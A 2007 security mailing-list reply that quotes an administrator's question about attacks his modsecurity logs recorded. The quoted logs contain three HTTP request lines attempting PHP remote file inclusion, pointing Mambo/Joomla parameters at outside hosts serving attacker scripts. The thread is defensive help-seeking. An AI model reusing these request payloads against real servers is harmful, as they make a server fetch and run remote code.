RE: PHP web exploit/vulnerability

[David Gutierrez <davegu1 () hotmail com>]

Camilo, 
Feel free to post it or send me a copy via email. 

David 

----------------------------------------> Date: Tue, 23 Oct 2007 11:29:47 -0500> From: colea () sunset com mx> To: 
security-basics () securityfocus com> Subject: PHP web exploit/vulnerability>> Hello everyone,>> I'm sorry if this is a 
stupid question, but I just wanted your input,> maybe direct me to some links, another mail list, or whatever you 
might> add would be highly appreciated; we have modsecurity installed on our> server, and it has been logging many 
attacks like the following:>> GET> 
/content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://beach.tsv-detti> \> ngen.de/admin/ec.txt? 
HTTP/1.1>> GET> /index.php?option=com_%3Cwbr%20//mambots/*.php?mosConfig_absolute_path=uid=48(apache)%> \> 
20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1>> GET /index.php?option=http://0x0134.lan.io/pb.php? HTTP/1.1>> I 
managed to get a copy of the php script which these attacks try to> force the server to execute, I could post it here 
if that is correct and> anybody could take a look at it and help me out a little to understand> what it's trying to 
do.>> Any help is appreciated, thanks in advance.>> Camilo Olea>>>

_________________________________________________________________
Windows Live Hotmail and Microsoft Office Outlook – together at last.  Get it now.
http://office.microsoft.com/en-us/outlook/HA102225181033.aspx?pid=CL100626971033